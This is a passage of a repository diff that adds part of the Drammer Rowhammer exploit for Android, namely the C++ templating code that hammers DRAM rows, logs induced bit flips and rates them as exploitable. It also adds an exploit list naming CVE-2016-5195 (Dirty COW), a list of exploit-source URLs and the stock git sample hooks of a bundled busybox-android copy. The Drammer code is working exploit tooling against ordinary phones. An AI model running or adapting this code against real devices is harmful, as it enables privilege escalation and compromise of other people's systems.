  170 + print("[FLIP] i:%p l:%d v:%p p:%p b:%5d 0x%08x != 0x%08x s:%d",
  171 + tmpl->ion_chunk->mapping,
  172 + tmpl->ion_len,
  173 + (void *) tmpl->virt_addr,
  174 + (void *) tmpl->phys_addr,
  175 + tmpl->byte_index_in_row,
  176 + tmpl->org_word,
  177 + tmpl->new_word,
  178 + tmpl->found_at);
  179 + printf("\n");
  180 +
  181 + tmpl->maybe_exploitable = is_exploitable(tmpl);
  182 + if (global_of) {
  183 + if (tmpl->maybe_exploitable) fprintf(global_of, "!\n");
  184 + else fprintf(global_of,"\n");
  185 + }
  186 +
  187 + templates.push_back(tmpl);
  188 +
  189 +
  190 +}
  191 +
  192 +int get_exploitable_flip_count(std::vector<struct template_t *> &templates) {
  193 + int count = 0;
  194 + for (auto tmpl : templates) {
  195 + if (tmpl->maybe_exploitable) count++;
  196 + }
  197 + return count;
  198 +}
  199 +int get_direction_flip_count(std::vector<struct template_t *> &templates, int direction) {
  200 + int count = 0;
  201 + for (auto tmpl : templates) {
  202 + if (tmpl->direction == direction) count++;
  203 + }
  204 + return count;
  205 +}
  206 +struct template_t * get_first_exploitable_flip(std::vector<struct template_t *> &templates) {
  207 + for (auto tmpl : templates) {
  208 + if (tmpl->maybe_exploitable) return tmpl;
  209 + }
  210 + return NULL;
  211 +}
  212 +
  213 +int find_flips_in_row(std::vector<struct template_t *> &templates, uintptr_t phys1) {
  214 + int flips = 0;
  215 + for (auto tmpl : templates) {
  216 + if (tmpl->phys_addr >= phys1 && tmpl->phys_addr < (phys1 + rowsize)) flips++;
  217 + }
  218 + return flips;
  219 +}
  220 +
  221 +int do_hammer(uint8_t *virt_row,
  222 + volatile uintptr_t *virt_above,
  223 + volatile uintptr_t *virt_below,
  224 + uint8_t *pattern_above,
  225 + uint8_t *pattern,
  226 + uint8_t *pattern_below,
  227 + std::vector<struct template_t *> &templates, struct ion_data *chunk,
  228 + int hammer_readcount) {
  229 +
  230 + int new_flips = 0;
  231 +
  232 + /* write pattern to victim row */
  233 + memcpy(virt_row, pattern, rowsize);
  234 +
  235 + /* hammer */
  236 + uint64_t t1 = get_ns();
  237 + for (int i = 0; i < hammer_readcount; i++) {
  238 + *virt_above;
  239 + *virt_below;
  240 + }
  241 + uint64_t t2 = get_ns();
  242 + int ns_per_read = (t2 - t1) / (hammer_readcount * 2);
  243 +
  244 + uint8_t *row_above = (uint8_t *) ((uintptr_t) virt_row - rowsize);
  245 + uint8_t *row_below = (uint8_t *) ((uintptr_t) virt_row + rowsize);
  246 +
  247 + /* compare bytes of the victim row again the original pattern */
  248 + for (int i = 0; i < rowsize; i++) {
  249 + if (virt_row[i] != pattern[i] ) {
  250 + if (template_exists(templates, (uintptr_t) virt_row + i, pattern[i], virt_row[i])) continue;
  251 +
  252 + new_flips++;
  253 + if (new_flips == 1) printf("\n");
  254 +
  255 + handle_flip(virt_row,
  256 + (uintptr_t *) virt_above,
  257 + (uintptr_t *) virt_below,
  258 + pattern, templates, i, chunk);
  259 + }
  260 +
  261 + if (row_above[i] != pattern_above[i] ) {
  262 + spc_flips++;
  263 + new_flips++;
  264 + if (new_flips == 1) printf("\n");
  265 + print("[SPECIAL FLIP] v:%p 0x%08x != 0x%08x\n", (uintptr_t) virt_above + i, virt_above[i], pattern_above[i]);
  266 + }
  267 + if (row_below[i] != pattern_below[i]) {
  268 + spc_flips++;
  269 + new_flips++;
  270 + if (new_flips == 1) printf("\n");
  271 + print("[SPECIAL FLIP] v:%p 0x%08x != 0x%08x\n", (uintptr_t) virt_below + i, virt_below[i], pattern_below[i]);
  272 + }
  273 + }
  274 + if (new_flips > 0)
  275 + printf("[TMPL - deltas] virtual row %d: ", (uintptr_t) virt_row / rowsize);
  276 +
  277 + return ns_per_read;
  278 +}
  279 +
  280 +bool times_up;
  281 +void alarm_handler(int signal) {
  282 + printf("\n[TIME] is up, wrapping up\n");
  283 + times_up = true;
  284 +}
  285 +
  286 +/* Perform 'conservative' rowhammer: we hammer each page in a row. The figure
  287 + * below - row size of 32K = 8 pages - illustrates a victim row (pages P1 .. P8)
  288 + * and its two aggressor rows (above, pages A1 .. A8, and below, pages B1 ..
  289 + * B8). We write patterns to the entire rows (using <*_row>) and then
  290 + * hammer pages by reading from <virt_above> and <virt_below>.
  291 + *
  292 + * /-- <above_row>
  293 + * | /-- <virt_above>
  294 + * | ----------+------------------------------
  295 + * \--->| A1 | A2 | A3 | A4 | A5 | A6 | A7 | A8 |
  296 + * -----------------------------------------
  297 + * /--->| P1 | P2 | P3 | P4 | P5 | P6 | P7 | P8 |<-- victim row
  298 + * | -----------------------------------------
  299 + * | /->| B1 | B2 | B3 | B4 | B5 | B6 | B7 | B8 |
  300 + * | | ----------+------------------------------
  301 + * | | \-- <virt_below>
  302 + * | \-- <below_row>
  303 + * \-- <virt_row>
  304 + */
  305 +void TMPL_run(std::vector<struct ion_data *> &chunks,
  306 + std::vector<struct template_t *> &templates,
  307 + std::vector<struct pattern_t *> &patterns, int timer, int hammer_readcount,
  308 + bool do_conservative) {
  309 +
  310 + int bytes_hammered = 0;
  311 + std::vector<uint64_t> readtimes;
  312 +
  313 + if (timer) {
  314 + printf("[TMPL] Setting alarm in %d seconds\n", timer);
  315 + signal(SIGALRM, alarm_handler);
  316 + alarm(timer);
  317 + }
  318 + times_up = false;
  319 +
  320 + int bytes_allocated = 0;
  321 + for (auto chunk : chunks) {
  322 + bytes_allocated += chunk->len;
  323 + }
  324 +
  325 + time_t start_time = time(NULL);
  326 + print("[TMPL] - Bytes allocated: %d (%d MB)\n", bytes_allocated, bytes_allocated / 1024 / 1024);
  327 + print("[TMPL] - Time: %d\n", start_time);
  328 + print("[TMPL] - Start templating\n");
  329 + for (auto chunk : chunks) {
  330 + ION_get_hammerable_rows(chunk);
  331 +
  332 + for (auto virt_row : chunk->hammerable_rows) {
  333 + uintptr_t phys_row = get_phys_addr(virt_row);
  334 + int virt_row_index = virt_row / rowsize;
  335 + int phys_row_index = phys_row / rowsize;
  336 +
  337 + int median_readtime = compute_median(readtimes);
  338 + int seconds_passed = time(NULL) - start_time;
  339 + int flips = templates.size();
  340 + int exploitable_flips = get_exploitable_flip_count(templates);
  341 + double kb_per_flip, percentage_exploitable;
  342 + int to0, to1;
  343 + if (flips > 0) {
  344 + kb_per_flip = (bytes_hammered / 1024) / (double) flips;
  345 + percentage_exploitable = (double) exploitable_flips / (double) flips * 100.0;
  346 + to0 = get_direction_flip_count(templates, ONE_TO_ZERO);
  347 + to1 = get_direction_flip_count(templates, ZERO_TO_ONE);
  348 + } else {
  349 + kb_per_flip = 0.0;
  350 + percentage_exploitable = 0.0;
  351 + to0 = 0;
  352 + to1 = 0;
  353 + }
  354 +
  355 + print("[TMPL - status] flips: %d | expl: %d | hammered: %d | runtime: %d | median: %d | kb_per_flip: %5.2f | perc_expl: %5.2f | special: %d | 0-to-1: %d | 1-to-0: %d\n",
  356 + flips, exploitable_flips, bytes_hammered, seconds_passed, median_readtime, kb_per_flip, percentage_exploitable, spc_flips, to1, to0);
  357 + print("[TMPL - hammer] virtual row %d: %p | physical row %d: %p\n",
  358 + virt_row_index, virt_row, phys_row_index, phys_row);
  359 + printf("[TMPL - deltas] virtual row %d: ", (uintptr_t) virt_row_index);
  360 +
  361 +
  362 + uintptr_t above_row = virt_row - rowsize;
  363 + uintptr_t below_row = virt_row + rowsize;
  364 +
  365 + int step = PAGESIZE;
  366 + if (do_conservative)
  367 + step = 64;
  368 +
  369 + for (int offset = 0; offset < rowsize; offset += step) {
  370 + uintptr_t virt_above = above_row + offset;
  371 + uintptr_t virt_below = below_row + offset;
  372 +
  373 + printf("|");
  374 + for (auto pattern: patterns) {
  375 +
  376 + /* write patterns to the adjacent rows and hammer */
  377 + memcpy((void *) above_row, pattern->above, rowsize);
  378 + memcpy((void *) below_row, pattern->below, rowsize);
  379 + int delta = do_hammer( (uint8_t *) virt_row,
  380 + (volatile uintptr_t *) virt_above,
  381 + (volatile uintptr_t *) virt_below,
  382 + pattern->above, pattern->victim, pattern->below, templates, chunk, hammer_readcount);
  383 + readtimes.push_back(delta);
  384 + printf("%d|", delta);
  385 +
  386 + pattern->cur_use++;
  387 + if (pattern->max_use && pattern->cur_use >= pattern->max_use) {
  388 + if (pattern->reset_above) pattern->reset_above (pattern->above);
  389 + if (pattern->reset_victim) pattern->reset_victim(pattern->victim);
  390 + if (pattern->reset_below) pattern->reset_below (pattern->below);
  391 + pattern->cur_use = 0;
  392 + }
  393 + }
  394 + printf(" ");
  395 +
  396 + bytes_hammered += step;
  397 +
  398 + if (times_up) break;
  399 + }
  400 + printf("\n");
  401 +
  402 + if (times_up) break;
  403 + }
  404 +
  405 + if (times_up) break;
  406 +
  407 + /* clean */
  408 + ION_clean(chunk);
  409 + }
  410 +
  411 + int median_readtime = compute_median(readtimes);
  412 +
  413 + printf("\n[TMPL] Done templating\n");
  414 + int flips = templates.size();
  415 + print("[TMPL] - bytes hammered: %d (%d MB)\n", bytes_hammered, bytes_hammered / 1024 / 1024);
  416 + print("[TMPL] - median readtime: %d\n", median_readtime);
  417 + print("[TMPL] - unique flips: %d (1-to-0: %d / 0-to-1: %d)\n", flips,
  418 + get_direction_flip_count(templates, ONE_TO_ZERO),
  419 + get_direction_flip_count(templates, ZERO_TO_ONE));
  420 +
  421 + if (flips > 0) {
  422 + double kb_per_flip = (bytes_hammered / 1024) / (double) flips;
  423 + printf("[TMPL] - kb per flip: %5.2f\n", kb_per_flip);
  424 + }
  425 + int exploitable_flips = get_exploitable_flip_count(templates);
  426 + print("[TMPL] - exploitable flips: %d\n", exploitable_flips);
  427 + if (exploitable_flips > 0) {
  428 + print("[TMPL] - first exploitable flip found after: %d seconds\n", get_first_exploitable_flip(templates)->found_at - start_time);
  429 +
  430 + double percentage_exploitable = (double) exploitable_flips / (double) flips * 100.0;
  431 + printf("[TMPL] - percentage of flips that are exploitable: %5.2f\n", percentage_exploitable);
  432 + }
  433 + print("[TMPL] - time spent: %d seconds\n", time(NULL) - start_time);
  434 +}
  435 +
... ...
exploits/drammer/templating.h 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/templating.h
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#ifndef __TEMPLATING_H__
  18 +#define __TEMPLATING_H__
  19 +
  20 +#include <vector>
  21 +
  22 +#include "ion.h"
  23 +
  24 +#define ONE_TO_ZERO 1
  25 +#define ZERO_TO_ONE 0
  26 +
  27 +#define FLIP_DIRECTION_STR(x) (((x) == ONE_TO_ZERO) ? "1-to-0" : "0-to-1")
  28 +
  29 +struct template_t {
  30 + uintptr_t virt_page; // virtual address of the vulnerable page
  31 + uintptr_t virt_addr; // virutal address of the vulnerable byte
  32 + uintptr_t virt_row;
  33 + uintptr_t phys_addr;
  34 + uintptr_t phys_page;
  35 + int virt_index;
  36 + uint8_t org_byte; // the original value of the vulnerable byte
  37 + uint32_t org_word;
  38 + uint8_t new_byte; // the new value
  39 + uint32_t new_word;
  40 + struct ion_data *ion_chunk;
  41 + int ion_len;
  42 +
  43 + uint8_t xorred_byte;
  44 + uint32_t xorred_word;
  45 + int bits_set;
  46 + int bit_offset;
  47 + int org_bit;
  48 + int direction;
  49 + bool maybe_exploitable;
  50 + bool likely_exploitable;
  51 + int rel_pfn;
  52 + int rel_address;
  53 + int rel_row_index;
  54 + uint32_t source_pte;
  55 + uint32_t target_pte;
  56 + uint32_t target_16k_pfn;
  57 + uint32_t source_16k_pfn;
  58 + uint32_t source_pfn, target_pfn;
  59 + uint32_t source_page_index_in_row, target_page_index_in_row;
  60 + uint32_t source_pfn_row, target_pfn_row;
  61 + int byte_index_in_row;
  62 + int byte_index_in_page;
  63 + int word_index_in_page;
  64 + int word_index_in_pt;
  65 + int bit_index_in_word;
  66 + int bit_index_in_byte;
  67 + uintptr_t virt_above;
  68 + uintptr_t virt_below;
  69 + bool confirmed;
  70 + time_t found_at;
  71 +};
  72 +
  73 +struct pattern_t {
  74 + uint8_t *above;
  75 + uint8_t *victim;
  76 + uint8_t *below;
  77 + int cur_use;
  78 + int max_use;
  79 + void (*reset_above) (uint8_t *);
  80 + void (*reset_victim)(uint8_t *);
  81 + void (*reset_below) (uint8_t *);
  82 +};
  83 +
  84 +
  85 +
  86 +struct template_t *templating(void);
  87 +void TMPL_run(std::vector<struct ion_data *> &chunks,
  88 + std::vector<struct template_t *> &templates,
  89 + std::vector<struct pattern_t *> &patterns, int timer, int hammer_readcount,
  90 + bool do_conservative);
  91 +struct template_t *find_template_in_rows(std::vector<struct ion_data *> &chunks, struct template_t *needle);
  92 +
  93 +#endif // __TEMPLATING_H__
... ...
exploits/exploit_list 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/exploit_list
  1 +cve_2016_5195
... ...
exploits/urls 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/urls
  1 +https://forum.xda-developers.com/showthread.php?t=1312859
  2 +https://forum.xda-developers.com/showthread.php?t=2050297
  3 +http://androidvulnerabilities.org/all
... ...
tools/busybox-android/.git-disabled/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/HEAD
  1 +ref: refs/heads/master
... ...
tools/busybox-android/.git-disabled/config 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/config
  1 +[core]
  2 + repositoryformatversion = 0
  3 + filemode = true
  4 + bare = false
  5 + logallrefupdates = true
  6 +[remote "origin"]
  7 + url = https://github.com/Gnurou/busybox-android.git
  8 + fetch = +refs/heads/*:refs/remotes/origin/*
  9 +[branch "master"]
  10 + remote = origin
  11 + merge = refs/heads/master
... ...
tools/busybox-android/.git-disabled/description 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/description
  1 +Unnamed repository; edit this file 'description' to name the repository.
... ...
tools/busybox-android/.git-disabled/hooks/applypatch-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/applypatch-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message taken by
  4 +# applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit. The hook is
  8 +# allowed to edit the commit message file.
  9 +#
  10 +# To enable this hook, rename this file to "applypatch-msg".
  11 +
  12 +. git-sh-setup
  13 +commitmsg="$(git rev-parse --git-path hooks/commit-msg)"
  14 +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"}
  15 +:
... ...
tools/busybox-android/.git-disabled/hooks/commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message.
  4 +# Called by "git commit" with one argument, the name of the file
  5 +# that has the commit message. The hook should exit with non-zero
  6 +# status after issuing an appropriate message if it wants to stop the
  7 +# commit. The hook is allowed to edit the commit message file.
  8 +#
  9 +# To enable this hook, rename this file to "commit-msg".
  10 +
  11 +# Uncomment the below to add a Signed-off-by line to the message.
  12 +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg
  13 +# hook is more suited to it.
  14 +#
  15 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  16 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
  17 +
  18 +# This example catches duplicate Signed-off-by lines.
  19 +
  20 +test "" = "$(grep '^Signed-off-by: ' "$1" |
  21 + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || {
  22 + echo >&2 Duplicate Signed-off-by lines.
  23 + exit 1
  24 +}
... ...
tools/busybox-android/.git-disabled/hooks/post-update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/post-update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare a packed repository for use over
  4 +# dumb transports.
  5 +#
  6 +# To enable this hook, rename this file to "post-update".
  7 +
  8 +exec git update-server-info
... ...
tools/busybox-android/.git-disabled/hooks/pre-applypatch.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/pre-applypatch.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed
  4 +# by applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit.
  8 +#
  9 +# To enable this hook, rename this file to "pre-applypatch".
  10 +
  11 +. git-sh-setup
  12 +precommit="$(git rev-parse --git-path hooks/pre-commit)"
  13 +test -x "$precommit" && exec "$precommit" ${1+"$@"}
  14 +:
... ...
tools/busybox-android/.git-disabled/hooks/pre-commit.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/pre-commit.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed.
  4 +# Called by "git commit" with no arguments. The hook should
  5 +# exit with non-zero status after issuing an appropriate message if
  6 +# it wants to stop the commit.
  7 +#
  8 +# To enable this hook, rename this file to "pre-commit".
  9 +
  10 +if git rev-parse --verify HEAD >/dev/null 2>&1
  11 +then
  12 + against=HEAD
  13 +else
  14 + # Initial commit: diff against an empty tree object
  15 + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904
  16 +fi
  17 +
  18 +# If you want to allow non-ASCII filenames set this variable to true.
  19 +allownonascii=$(git config --bool hooks.allownonascii)
  20 +
  21 +# Redirect output to stderr.
  22 +exec 1>&2
  23 +
  24 +# Cross platform projects tend to avoid non-ASCII filenames; prevent
  25 +# them from being added to the repository. We exploit the fact that the
  26 +# printable range starts at the space character and ends with tilde.
  27 +if [ "$allownonascii" != "true" ] &&
  28 + # Note that the use of brackets around a tr range is ok here, (it's
  29 + # even required, for portability to Solaris 10's /usr/bin/tr), since
  30 + # the square bracket bytes happen to fall in the designated range.
  31 + test $(git diff --cached --name-only --diff-filter=A -z $against |
  32 + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0
  33 +then
  34 + cat <<\EOF
  35 +Error: Attempt to add a non-ASCII file name.
  36 +
  37 +This can cause problems if you want to work with people on other platforms.
  38 +
  39 +To be portable it is advisable to rename the file.
  40 +
  41 +If you know what you are doing you can disable this check using:
  42 +
  43 + git config hooks.allownonascii true
  44 +EOF
  45 + exit 1
  46 +fi
  47 +
  48 +# If there are whitespace errors, print the offending file names and fail.
  49 +exec git diff-index --check --cached $against --
... ...
tools/busybox-android/.git-disabled/hooks/pre-push.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/pre-push.sample
  1 +#!/bin/sh
  2 +
  3 +# An example hook script to verify what is about to be pushed. Called by "git
  4 +# push" after it has checked the remote status, but before anything has been
  5 +# pushed. If this script exits with a non-zero status nothing will be pushed.
  6 +#
  7 +# This hook is called with the following parameters:
  8 +#
  9 +# $1 -- Name of the remote to which the push is being done
  10 +# $2 -- URL to which the push is being done
  11 +#
  12 +# If pushing without using a named remote those arguments will be equal.
  13 +#
  14 +# Information about the commits which are being pushed is supplied as lines to
  15 +# the standard input in the form:
  16 +#
  17 +# <local ref> <local sha1> <remote ref> <remote sha1>
  18 +#
  19 +# This sample shows how to prevent push of commits where the log message starts
  20 +# with "WIP" (work in progress).
  21 +
  22 +remote="$1"
  23 +url="$2"
  24 +
  25 +z40=0000000000000000000000000000000000000000
  26 +
  27 +while read local_ref local_sha remote_ref remote_sha
  28 +do
  29 + if [ "$local_sha" = $z40 ]
  30 + then
  31 + # Handle delete
  32 + :
  33 + else
  34 + if [ "$remote_sha" = $z40 ]
  35 + then
  36 + # New branch, examine all commits
  37 + range="$local_sha"
  38 + else
  39 + # Update to existing branch, examine new commits
  40 + range="$remote_sha..$local_sha"
  41 + fi
  42 +
  43 + # Check for WIP commit
  44 + commit=`git rev-list -n 1 --grep '^WIP' "$range"`
  45 + if [ -n "$commit" ]
  46 + then
  47 + echo >&2 "Found WIP commit in $local_ref, not pushing"
  48 + exit 1
  49 + fi
  50 + fi
  51 +done
  52 +
  53 +exit 0
... ...
tools/busybox-android/.git-disabled/hooks/pre-rebase.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/pre-rebase.sample
  1 +#!/bin/sh
  2 +#
  3 +# Copyright (c) 2006, 2008 Junio C Hamano
  4 +#
  5 +# The "pre-rebase" hook is run just before "git rebase" starts doing
  6 +# its job, and can prevent the command from running by exiting with
  7 +# non-zero status.
  8 +#
  9 +# The hook is called with the following parameters:
  10 +#
  11 +# $1 -- the upstream the series was forked from.
  12 +# $2 -- the branch being rebased (or empty when rebasing the current branch).
  13 +#
  14 +# This sample shows how to prevent topic branches that are already
  15 +# merged to 'next' branch from getting rebased, because allowing it
  16 +# would result in rebasing already published history.
  17 +
  18 +publish=next
  19 +basebranch="$1"
  20 +if test "$#" = 2
  21 +then
  22 + topic="refs/heads/$2"
  23 +else
  24 + topic=`git symbolic-ref HEAD` ||
  25 + exit 0 ;# we do not interrupt rebasing detached HEAD
  26 +fi
  27 +
  28 +case "$topic" in
  29 +refs/heads/??/*)
  30 + ;;
  31 +*)
  32 + exit 0 ;# we do not interrupt others.
  33 + ;;
  34 +esac
  35 +
  36 +# Now we are dealing with a topic branch being rebased
  37 +# on top of master. Is it OK to rebase it?
  38 +
  39 +# Does the topic really exist?
  40 +git show-ref -q "$topic" || {
  41 + echo >&2 "No such branch $topic"
  42 + exit 1
  43 +}
  44 +
  45 +# Is topic fully merged to master?
  46 +not_in_master=`git rev-list --pretty=oneline ^master "$topic"`
  47 +if test -z "$not_in_master"
  48 +then
  49 + echo >&2 "$topic is fully merged to master; better remove it."
  50 + exit 1 ;# we could allow it, but there is no point.
  51 +fi
  52 +
  53 +# Is topic ever merged to next? If so you should not be rebasing it.
  54 +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort`
  55 +only_next_2=`git rev-list ^master ${publish} | sort`
  56 +if test "$only_next_1" = "$only_next_2"
  57 +then
  58 + not_in_topic=`git rev-list "^$topic" master`
  59 + if test -z "$not_in_topic"
  60 + then
  61 + echo >&2 "$topic is already up-to-date with master"
  62 + exit 1 ;# we could allow it, but there is no point.
  63 + else
  64 + exit 0
  65 + fi
  66 +else
  67 + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"`
  68 + /usr/bin/perl -e '
  69 + my $topic = $ARGV[0];
  70 + my $msg = "* $topic has commits already merged to public branch:\n";
  71 + my (%not_in_next) = map {
  72 + /^([0-9a-f]+) /;
  73 + ($1 => 1);
  74 + } split(/\n/, $ARGV[1]);
  75 + for my $elem (map {
  76 + /^([0-9a-f]+) (.*)$/;
  77 + [$1 => $2];
  78 + } split(/\n/, $ARGV[2])) {
  79 + if (!exists $not_in_next{$elem->[0]}) {
  80 + if ($msg) {
  81 + print STDERR $msg;
  82 + undef $msg;
  83 + }
  84 + print STDERR " $elem->[1]\n";
  85 + }
  86 + }
  87 + ' "$topic" "$not_in_next" "$not_in_master"
  88 + exit 1
  89 +fi
  90 +
  91 +<<\DOC_END
  92 +
  93 +This sample hook safeguards topic branches that have been
  94 +published from being rewound.
  95 +
  96 +The workflow assumed here is:
  97 +
  98 + * Once a topic branch forks from "master", "master" is never
  99 + merged into it again (either directly or indirectly).
  100 +
  101 + * Once a topic branch is fully cooked and merged into "master",
  102 + it is deleted. If you need to build on top of it to correct
  103 + earlier mistakes, a new topic branch is created by forking at
  104 + the tip of the "master". This is not strictly necessary, but
  105 + it makes it easier to keep your history simple.
  106 +
  107 + * Whenever you need to test or publish your changes to topic
  108 + branches, merge them into "next" branch.
  109 +
  110 +The script, being an example, hardcodes the publish branch name
  111 +to be "next", but it is trivial to make it configurable via
  112 +$GIT_DIR/config mechanism.
  113 +
  114 +With this workflow, you would want to know:
  115 +
  116 +(1) ... if a topic branch has ever been merged to "next". Young
  117 + topic branches can have stupid mistakes you would rather
  118 + clean up before publishing, and things that have not been
  119 + merged into other branches can be easily rebased without
  120 + affecting other people. But once it is published, you would
  121 + not want to rewind it.
  122 +
  123 +(2) ... if a topic branch has been fully merged to "master".
  124 + Then you can delete it. More importantly, you should not
  125 + build on top of it -- other people may already want to
  126 + change things related to the topic as patches against your
  127 + "master", so if you need further changes, it is better to
  128 + fork the topic (perhaps with the same name) afresh from the
  129 + tip of "master".
  130 +
  131 +Let's look at this example:
  132 +
  133 + o---o---o---o---o---o---o---o---o---o "next"
  134 + / / / /
  135 + / a---a---b A / /
  136 + / / / /
  137 + / / c---c---c---c B /
  138 + / / / \ /
  139 + / / / b---b C \ /
  140 + / / / / \ /
  141 + ---o---o---o---o---o---o---o---o---o---o---o "master"
  142 +
  143 +
  144 +A, B and C are topic branches.
  145 +
  146 + * A has one fix since it was merged up to "next".
  147 +
  148 + * B has finished. It has been fully merged up to "master" and "next",
  149 + and is ready to be deleted.
  150 +
  151 + * C has not merged to "next" at all.
  152 +
  153 +We would want to allow C to be rebased, refuse A, and encourage
  154 +B to be deleted.
  155 +
  156 +To compute (1):
  157 +
  158 + git rev-list ^master ^topic next
  159 + git rev-list ^master next
  160 +
  161 + if these match, topic has not merged in next at all.
  162 +
  163 +To compute (2):
  164 +
  165 + git rev-list master..topic
  166 +
  167 + if this is empty, it is fully merged to "master".
  168 +
  169 +DOC_END
... ...
tools/busybox-android/.git-disabled/hooks/pre-receive.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/pre-receive.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to make use of push options.
  4 +# The example simply echoes all push options that start with 'echoback='
  5 +# and rejects all pushes when the "reject" push option is used.
  6 +#
  7 +# To enable this hook, rename this file to "pre-receive".
  8 +
  9 +if test -n "$GIT_PUSH_OPTION_COUNT"
  10 +then
  11 + i=0
  12 + while test "$i" -lt "$GIT_PUSH_OPTION_COUNT"
  13 + do
  14 + eval "value=\$GIT_PUSH_OPTION_$i"
  15 + case "$value" in
  16 + echoback=*)
  17 + echo "echo from the pre-receive-hook: ${value#*=}" >&2
  18 + ;;
  19 + reject)
  20 + exit 1
  21 + esac
  22 + i=$((i + 1))
  23 + done
  24 +fi
... ...
tools/busybox-android/.git-disabled/hooks/prepare-commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/prepare-commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare the commit log message.
  4 +# Called by "git commit" with the name of the file that has the
  5 +# commit message, followed by the description of the commit
  6 +# message's source. The hook's purpose is to edit the commit
  7 +# message file. If the hook fails with a non-zero status,
  8 +# the commit is aborted.
  9 +#
  10 +# To enable this hook, rename this file to "prepare-commit-msg".
  11 +
  12 +# This hook includes three examples. The first comments out the
  13 +# "Conflicts:" part of a merge commit.
  14 +#
  15 +# The second includes the output of "git diff --name-status -r"
  16 +# into the message, just before the "git status" output. It is
  17 +# commented because it doesn't cope with --amend or with squashed
  18 +# commits.
  19 +#
  20 +# The third example adds a Signed-off-by line to the message, that can
  21 +# still be edited. This is rarely a good idea.
  22 +
  23 +case "$2,$3" in
  24 + merge,)
  25 + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;;
  26 +
  27 +# ,|template,)
  28 +# /usr/bin/perl -i.bak -pe '
  29 +# print "\n" . `git diff --cached --name-status -r`
  30 +# if /^#/ && $first++ == 0' "$1" ;;
  31 +
  32 + *) ;;
  33 +esac
  34 +
  35 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  36 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
... ...
tools/busybox-android/.git-disabled/hooks/update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/hooks/update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to block unannotated tags from entering.
  4 +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new
  5 +#
  6 +# To enable this hook, rename this file to "update".
  7 +#
  8 +# Config
  9 +# ------
  10 +# hooks.allowunannotated
  11 +# This boolean sets whether unannotated tags will be allowed into the
  12 +# repository. By default they won't be.
  13 +# hooks.allowdeletetag
  14 +# This boolean sets whether deleting tags will be allowed in the
  15 +# repository. By default they won't be.
  16 +# hooks.allowmodifytag
  17 +# This boolean sets whether a tag may be modified after creation. By default
  18 +# it won't be.
  19 +# hooks.allowdeletebranch
  20 +# This boolean sets whether deleting branches will be allowed in the
  21 +# repository. By default they won't be.
  22 +# hooks.denycreatebranch
  23 +# This boolean sets whether remotely creating branches will be denied
  24 +# in the repository. By default this is allowed.
  25 +#
  26 +
  27 +# --- Command line
  28 +refname="$1"
  29 +oldrev="$2"
  30 +newrev="$3"
  31 +
  32 +# --- Safety check
  33 +if [ -z "$GIT_DIR" ]; then
  34 + echo "Don't run this script from the command line." >&2
  35 + echo " (if you want, you could supply GIT_DIR then run" >&2
  36 + echo " $0 <ref> <oldrev> <newrev>)" >&2
  37 + exit 1
  38 +fi
  39 +
  40 +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then
